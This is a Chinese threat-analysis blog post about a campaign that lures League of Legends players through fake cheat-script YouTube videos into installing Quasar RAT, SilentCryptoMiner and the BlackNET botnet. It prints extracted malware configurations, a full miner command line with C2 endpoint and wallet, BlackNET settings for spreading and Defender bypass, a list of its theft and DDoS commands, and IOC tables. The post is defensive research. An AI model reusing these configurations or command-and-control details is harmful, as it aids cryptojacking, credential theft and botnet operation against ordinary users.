针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

文章首发地址:
https://xz.aliyun.com/t/15277
文章首发作者:
T0daySeeker

近期,笔者在日常工作中,无意间发现了某攻击团伙利用youtube视频网站针对LOL玩家进行木马钓鱼的攻击活动。通过分析,发现攻击者在youtube视频网站发布LOL辅助脚本介绍的视频,同时还在视频下方伪造了大量的评论信息及脚本下载地址,营造了一种视频很受欢迎的假象。进一步分析,发现攻击者将脚本下载网站页面进行了精心的构造,用以引导用户下载脚本并试用。当用户下载执行相关脚本文件后,即会被植入多种不同的远控木马程序。

通过对木马程序及恶意脚本下载网站进行对比分析,发现攻击者使用了多个开源远控木马框架。基于技术手段提取受控信息,发现全球有大几百个LOL玩家被钓鱼受控,同时「存在大量国内玩家受控的情况」

受控情况如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

钓鱼攻击

通过分析,发现攻击团伙于2023年8月19日注册youtube账号,然后在其youtube频道发布了两个视频:

  • 2024年7月24日,视频标题《LOL Script 2024 – Updated 07/08/2024 FREE TRIAL》,视频对脚本使用效果进行了展示,脚本下载地址:namzsmurf.net
  • 2023年10月6日:视频标题《RoyalBlock.to: The Ultimate Block Battle Royale Experience!》,视频介绍了一款方块游戏,网站访问地址:royalblock.to,访问网站后发现,此网站并非方块游戏网站,而是LOL游戏的免费辅导网站,推测应该是攻击者对网站内容进行了更新

youtube频道截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

钓鱼视频一

攻击者在youtube视频下方备注了脚本下载地址,对应youtube频道视频截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

恶意脚本下载网站截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

钓鱼视频二

攻击者在youtube视频下方备注了方块游戏的访问地址,对应youtube频道视频截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

实际访问网站后发现,此网站并非方块游戏网站,而是LOL游戏的免费辅导网站,推测应该是攻击者对网站内容进行了更新,相关网站截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

关联分析

通过关联分析,发现svchost.exe(72982e83206930e2da3f4887ef09520fbf6937f9475f34620c6a78843c640a65)样本的外链地址即为91.92.242.16。相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

通过关联分析,发现vps-276e8ec4.vps.ovh.net域名的解析IP与royalblock.to域名的解析IP相同,相关网站截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

NamzScript.exe

通过分析,发现此文件是一个SFX自解压文件,样本运行后,将自解压文件至%appdata%目录,解压完成后将执行start.vbs脚本文件,相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

start.vbs

通过分析,发现start.vbs脚本运行后,将使用解压密码“1337guy$$$”自解压Client-built2.sfx.exe文件,相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

Client-built.exe

通过分析,发现此样本是一款Quasar RAT远控木马。

进一步分析,发现此样本的Quasar RAT远程木马版本为1.4.1,并且此样本的反编译代码与github上下载的开源Quasar RAT远控木马的反编译代码完全相同,因此,推测此样本应该是攻击者直接从https://github.com/quasar/Quasar地址下载的最新版本所得。

「备注:关于Quasar RAT开源远控木马的详细分析资料,大家可查看笔者的历史分析文章《QuasarRAT与AsyncRAT同源对比及分析》,文章地址:https://xz.aliyun.com/t/13596

解密算法

通过分析,发现此样本的解密算法与github上下载的开源Quasar RAT远控的解密算法完全相同。相关代码截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

解密配置信息

基于《QuasarRAT与AsyncRAT同源对比及分析》文章中提到的自动化配置信息解密脚本,可有效解密此木马程序的配置信息,解密后的配置信息如下:

Version:"1.4.1"
Hosts:"namz.read-books.org:1337;"
Install Subdirectory:"SubDir"
Install Name:"WindowsUpdate.exe"
Mutex:"06f1c124-2f86-4205-a4b8-825abb0ee5d0"
Startup Name:"DqdCQdqc"
Client Tag:"TrumpUS"
Log Dirctory Name:"Logs"
Serversignature:"WSX/zrjZPMvloBCYoCZwXk5oUXlv1h1OILhSvV6iFexcuLJELOHJ+Sgm48BVlwoWT/FCXvsrDmMFnrGJp7gcSLIphO1Syoe7L1hu9ZjPyKgDAD4jlZU8QLnev29dBqFhhyG4RAieAl0WymMO72yC0VDCOVjt10AXt83tfRYQCDhYVwiu8GIi/Dr/ZA4549GgIQYHA4ma38q21Dj5/rf5KDdvf8sWZ2gApHA7MKS4GekYMp1sGPO4iJHx7PCKbx3aB9vU2zYrPdQoGHk+flSUm+quSEjehuBD3fPGWn3TasShmi7xf1CVB2e3M0bqArwTkVvdewftdJTRP81BqUUn+qudQTNh0+2HnjUgXrXkHrNAaZHFOw9CgoDkB3uao8c/p72giDKQn1lU31uiws3qrN5Sq0Xx2eb/B3GQOJwz+NbM7NqBZK230Rp3CjItFqnb+jOdWUuiZ7ejb43bGo6UzOFwwvFkQGgfCr3H4r8+IH/4OQ4EPiH1bg+bggj9DM3nAxPBIxzELOr+S+g43EovvOGw2GHeckA5El5Cljhg1yfrshYZSHYpieo8+5KYXlint7oe0HP1TG30H03IxDOufvEh0jPeW/rLEZhtxYmIn9LtuwahiZ/+3jjbAjoWFN17Abdzdp6e21gEfJI0cqwW6sSxzL6a8mfWqxSSZXjCyyA="
Certificate:"MIIE9DCCAtygAwIBAgIQAJOHSHzhHMAszggZP4r4rTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDgwMTEwMDAwOVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAm8D36T/WXpCEOOAO1iOpQiVnvsMi28QfDHydIn+YCkT38KhNMToB/26qX1uI0ug4hR/DVOWg6QWV8BdAR01jeDesu32Jle9yF+MbIpDhMCJur/4XJmRiOY9+V5PUDhZwq51zzxItpZJD0zXh9KV1Pls+EuMvv3XFtXX21cUQAe5fDIVN4HxK1pADRwZ0S5YSJEGuZnC3VbStQBOJ+2VijcxPbWSSnTfFAK9mqfS7PtuIHD9mH9ahkJwbN9unand0N6/bYQnzY/pwbMAJApJ9GOBrB/3GTmDqzo+h3aFfXJykv2ZpJN1nb2vxPg3L1I8jMUpT20B0rOMEMzjxqEL8vSBexFO3NEoxpyQNTzolUFqsajHLCjozniro+KzDpoiwks+TLoC1Mz41RrWWBNz3c23uFs/giIKhohhn8T07d9gYbzo2IMw5Y/0diLmrEAEps39v3crFGm12u4Apx5KoCtHm53CziVVgs8Da4KwXeJt87oShuHN5Yj8g3o5AEzrEb/QUMvGBkfFDe6FuJ/Xm+ZN+2VTNJJrtlhi3iEV6IL4RdzT1x6kJ1xqRME1Ntz5rGyLW76UjIr6Baxb+zuoBnN2yOH3eSx2X8BVVslGmT874XrPXrcGzcCKUtZqCEkYODX4LylPBXzQ73RplVwbX9oFEvoc24LKh5kSui88Xqb0CAwEAAaMyMDAwHQYDVR0OBBYEFDz0A4HbGVoI4GBkjzEtWx8p3w3GMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAIXXWHYCe1DXFBW8Zg0vh0h4nn5aRnYqX63U/cJ1u44VSu+e491o5c/If4JyXUWgywPR4Eo/cmEjJk+eym4eDzzR6WDjTuxd12pKhp/F1+2WOTTag66ILyXWPoIjPW77iSnTck9sAgiQKjDFgdjOvPwA/+k9DNurxSw/Rs/5cGs0QR8wrw6HnieEvVAqHYIZfuaoCevEW4MNmbVa7ifY/d+Fb2o+hBcd6oQhC6J+yQkA52RMBFGWjUeLHbzFFaCjrBImgjnXcu/6qNdEL1MNoFo3jOVpTYK4ZIn+Puwn65B4O9Ln49ffYO4yhqvDF3ynUOhZSRDDkh9SlMzNywOBokOkY9+ufZMrIQwDZFH98PFAERTyzZt3OjN+U8OPxoIEawt+pkJo8q5g3eMwEG4uJYduaio4Eamn3jjoMnB0WCIuJn2E2pFK/GU0rvP0wprP1zu8PMbGIube2RZ4eP6yUKBfOkiLO/A3MIro6yqTppeBlvZrujV3xNb69/fIpmoLIQJyVhcTQjgcAtUfFa9HalmsfTpcCraHtabrH4g6OuwMKCqaHYtoYzYWOzwZAikvGY+1OOLT7TYYthXCAVd17kRqNXPyQZq/4Y4G1POUoXKlRCVoKq7d+tr7s6VoV9lh+iB1aVG8Bg3oAg+NEp9DgO8wYi3pmpCnPHJFW74K4vDb"

Update.exe

通过分析,发现此样本是SilentCryptoMiner挖矿木马,开源项目地址为https://github.com/UnamSanctam/SilentCryptoMiner(备注:目前此开源项目已被Github禁用)

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

自启动

通过分析,发现此样本运行后,将复制自身至C:ProgramDatabjvvxgbjmpijnpldfzxzkixc.exe路径,然后创建LDQRSTKE服务,用以实现木马程序自启动。相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

释放文件

进一步分析,发现此样本运行后,将在C:WindowsTemp目录下释放edcchowqigmf.sys文件,进一步分析,发现此驱动文件即为xmrig挖矿软件中的WinRing0x64.sys驱动文件,相关对比截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

进程注入

通过分析,发现样本运行后,还将启动dialer进程,然后将恶意代码注入到该进程当中,注入的恶意代码使用的是UPX加壳。相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

配置信息

通过分析,提取此样本的配置信息:

  • 注入进程:dialer.exe
  • 矿池地址:zeph.2miners.com:2222
  • 钱包地址:ZEPHYR2CLWQJrcoTC34ZFxUhj3zHM6SXRL9rCJUoFpLsJgn2FQBiG5uYJD64vAodJNYiaGFjUpUEFUEZLYPjxgDm3AoF7ig3UiC1D
  • stealth-targets:Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe
  • 上线地址:http://51.77.140.74/api/endpoint.php

完整配置信息如下:

dialer.exe --algo=rx/0 --url=zeph.2miners.com:2222 --user=ZEPHYR2CLWQJrcoTC34ZFxUhj3zHM6SXRL9rCJUoFpLsJgn2FQBiG5uYJD64vAodJNYiaGFjUpUEFUEZLYPjxgDm3AoF7ig3UiC1D.RIG --pass=x --cpu-max-threads-hint=20 --cinit-winring=edcchowqigmf.sys --randomx-no-rdmsr --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe --cinit-stealth-fullscreen --cinit-api=http://51.77.140.74/api/endpoint.php --cinit-version=3.4.1 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-id=jrnfypllqlwghdvf

进一步分析,发现此样本具备Rootkit功能,可针对stealth-targets配置信息中的目标进程,隐藏其注入进程。相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

钱包地址追踪

尝试对此挖矿程序的钱包地址进行追踪,相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

svchost.exe

通过分析,发现此样本是一款BlackNET僵尸网络木马,开源项目地址为https://github.com/FarisCode511/BlackNET(备注:目前此开源项目已不再维护,且已被删除)

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

配置信息

通过分析,提取此样本的配置信息如下,通过对此配置信息进行剖析,发现此样本具备反沙箱、USB传播、Dropbox云盘和OneDrive云盘传播等功能:

Host = "http://91.92.242.16/Panel/"
ID = "Ydt6Vl"
Startup = "True"
HardInstall = "True"
StartName = "e162b1333458a713bc6916cc8ac4110c"
BypassScanning = "True"
USBSpread = "True"
DBSpread = "True"
ODSpread = "True"
AntiVM = "True"
ElevateUAC = "True"
AESKey = ""
AESStatus = "False"
InstallName = "WindowsUpdate.exe"
PathS = "Temp "
ASchtask = "False"
DebugMode = "False"
KeyloggerOnRun = "False"
WatcherStatus = "True"
BinderStatus = "False"
DropperPath = ""
DownloaderStatus = "False"
DownloaderPath = ""
DelayCodeStatus = "True"
DelayCodeTime = "4428"
BypassWD = "True"
EnableCP = "True"
Ver = "v3.7.0 Public"
st = 0
Y = "|BN|"
MTX = "BN[]"

相关代码截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

反虚拟机

通过分析,发现此样本运行后,将通过判断虚拟机文件的方式来检查虚拟机环境,若运行至虚拟机环境,则将直接退出,相关代码截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

传播功能

通过分析,发现此样本支持USB和Dropbox云盘、OneDrive云盘传播,相关代码截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

远控指令

通过分析,梳理此样本的远控指令如下:

主指令 子指令
Ping
StartDDOS UDPAttack、SlowlorisAttack、ARMEAttack、TCPAttack、HTTPGetAttack、BWFloodAttack、PostHTTPAttack
StopDDOS UDPAttack、SlowlorisAttack、ARMEAttack、TCPAttack、HTTPGetAttack、BWFloodAttack、PostHTTPAttack
UploadFile
OpenPage
OpenHidden
Uninstall
ExecuteScript bat、vbs、ps1
StealDiscord
Close
ShowMessageBox None、Information、Asterisk、Critical、Warning、Question、OkOnly、OkCancel、YesNo、YesNoCancel、AbortRetryIgnore、RetryCancel
MoveClient
Blacklist
Screenshot
XMRMiner
TorrentSeeder
StealCookie
StealChCookies
InstalledSoftwares
GetClipboard
GetFile
StealBitcoin
StartKeylogger
StopKeylogger
RetriveLogs
StealPassword
InvokeCustom
SpamEmail
RemoteShell
CleanTemp
UpdateClient
Restart
Elevate
Logoff
Restart
Shutdown

相关代码截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

网站分析

结合样本功能及网站情况,对网站进行简单分析,发现上述两个钓鱼网站均存在后台登录页面,结合网站特征,发现:

  • namzsmurf.net网站部署了BlackNET僵尸网络控制后台;
  • royalblock.to网站部署了SilentCryptoMiner挖矿木马控制后台;

相关截图如下:

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

相关码址

  • 域名、IP、URL信息如下:
域名、IP、URL 归属地 备注
namzsmurf.net(91.92.242.16) 荷兰
royalblock.to(51.77.140.74) 法国 上法兰西大区 鲁贝
vps-276e8ec4.vps.ovh.net(51.77.140.74) 法国 上法兰西大区 鲁贝
namz.read-books.org:1337(87.89.82.13) 法国 大东部大区 斯特拉斯堡 Client-built.exe外链地址
zeph.2miners.com:2222
Update.exe矿池地址
http://51.77.140.74/api/endpoint.php 法国 上法兰西大区 鲁贝 Update.exe上线地址
http://91.92.242.16/Panel/ 荷兰 svchost.exe外链地址
  • Hashs信息如下:
文件名 Hash 备注
NamzScript.exe be87988d10070a2a95aa02f5cdab0aab 自解压文件
start.vbs 9c9c5ace80e216ae113c55a317414edd
Client-built2.sfx.exe 34ce1530d7c6221627ba23c7aca03435 自解压文件
Client-built.exe be87988d10070a2a95aa02f5cdab0aab Quasar RAT
Update.exe 42FA3ED3A69E46DD9E736B6779FCB461 SilentCryptoMiner挖矿木马
edcchowqigmf.sys 0C0195C48B6B8582FA6F6373032118DA WinRing0x64.sys
svchost.exe 67289188208C899195083547187789C9 BlackNET僵尸网络木马


原文始发于微信公众号(T0daySeeker):针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控

版权声明:admin 发表于 2024年8月17日 上午8:14。
转载请注明:针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控 | CTF导航

相关文章